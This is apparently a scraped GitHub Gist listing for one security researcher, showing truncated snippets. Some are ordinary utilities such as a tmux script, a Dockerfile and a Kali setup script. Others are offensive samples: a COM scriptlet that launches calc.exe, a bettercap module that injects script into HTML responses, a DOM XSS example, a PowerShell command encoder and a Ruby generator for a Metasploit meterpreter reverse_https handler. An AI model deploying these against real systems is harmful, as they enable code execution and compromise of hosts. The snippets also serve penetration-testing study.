Skip to content

Instantly share code, notes, and snippets.

View gabemarshall's full-sized avatar

Gabe Marshall gabemarshall

121 followers · 15 following
View GitHub Profile
@gabemarshall
gabemarshall / xor.ps1
Last active November 1, 2023 11:17
Simple Encrypt and Decrypt with Powershell
# Not secure by any means, just a PoC for XOR'ing data using powershell
# Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption
$enc = [System.Text.Encoding]::UTF8
function xor {
param($string, $method)
$xorkey = $enc.GetBytes("secretkey")
if ($method -eq "decrypt"){
@gabemarshall
gabemarshall / pow.txt
Last active September 9, 2021 02:20
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
@gabemarshall
gabemarshall / widget.js
Created July 31, 2016 16:33
String literal for blessed-widgets
/**
* widget.js - high-level interface for blessed
* Copyright (c) 2013-2015, Christopher Jeffrey and contributors (MIT License).
* https://github.com/chjj/blessed
*/
var widget = exports;
widget['Node'] = widget['node'] = require('./widgets/node')
widget['Screen'] = widget['screen'] = require('./widgets/screen')
widget['Element'] = widget['element'] = require('./widgets/element')
@gabemarshall
gabemarshall / tmux.sh
Created April 19, 2016 00:04
Sample script to start a tmux session with a vertically split window
#!/bin/bash
SESSION=$USER
tmux -2 new-session -d -s $SESSION
# Setup a window
tmux new-window -t $SESSION:1 -n 'The Internet'
# Split the window vertically
tmux split-window -v
@gabemarshall
gabemarshall / kalirolling.sh
Last active January 20, 2020 10:06
#!/bin/bash
# A fork of g0tmi1k's kali script
#-Metadata----------------------------------------------------#
# Filename: kali-rolling.sh (Update: 2016-04-08) #
#-Info--------------------------------------------------------#
# Personal post-install script for Kali Linux Rolling #
#-Author(s)---------------------------------------------------#
# g0tmilk ~ https://blog.g0tmi1k.com/ #
#-Operating System--------------------------------------------#
# Designed for: Kali Linux Rolling [x64] (VM - VMware) #
@gabemarshall
gabemarshall / bettercap_activex.rb
Created November 24, 2015 00:50
class InjectJS < Proxy::Module
def on_request( request, response )
if response.content_type =~ /^text\/html.*/
if response.headers =~ /MSIE/
response.body.sub!( '</title>', "</title><script type='text/javascript'></script>" )
end
end
end
end
@gabemarshall
gabemarshall / domxss.js
Created October 5, 2015 17:16
Dom based xss example
var debug = document.getElementById("subnav")
function _Debug_(p) {
p = p.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
var r = new RegExp("[\\?&]" + p + "=([^&#]*)"),
results = r.exec(location.search);
return results == null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
}
if(location.search){
@gabemarshall
gabemarshall / Dockerfile
Created July 20, 2015 15:34
Dockerfile for VNC firefox "sandbox"
# Firefox over VNC
#
# VERSION 0.1
# DOCKER-VERSION 0.2
from ubuntu:12.04
# make sure the package repository is up to date
run echo "deb http://archive.ubuntu.com/ubuntu precise main universe" > /etc/apt/sources.list
run apt-get update
@gabemarshall
gabemarshall / powerhell.py
Created July 12, 2015 16:46
Powerhell
#!/usr/bin/env python
#
# Powerhell
#
# by Gabe Marshall
# base64 encodes command line argument to Windows PowerShell
#
# Heavily influenced by Carol Perez's ps_encoder script (https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py)
import base64
@gabemarshall
gabemarshall / AutoListener.rb
Last active August 29, 2015 14:20
Simple ruby script to generate a metasploit rc file
#!/usr/bin/ruby
def meterpit(lhost, lport)
options = "use multi/handler\n"
options += "set payload windows/meterpreter/reverse_https\n"
options += "set LHOST #{lhost}\nset LPORT #{lport}\n"
options += "set ExitOnSession false\n"
options += "set AutoRunScript post/windows/manage/smart_migration\n"
options += "exploit -j\n"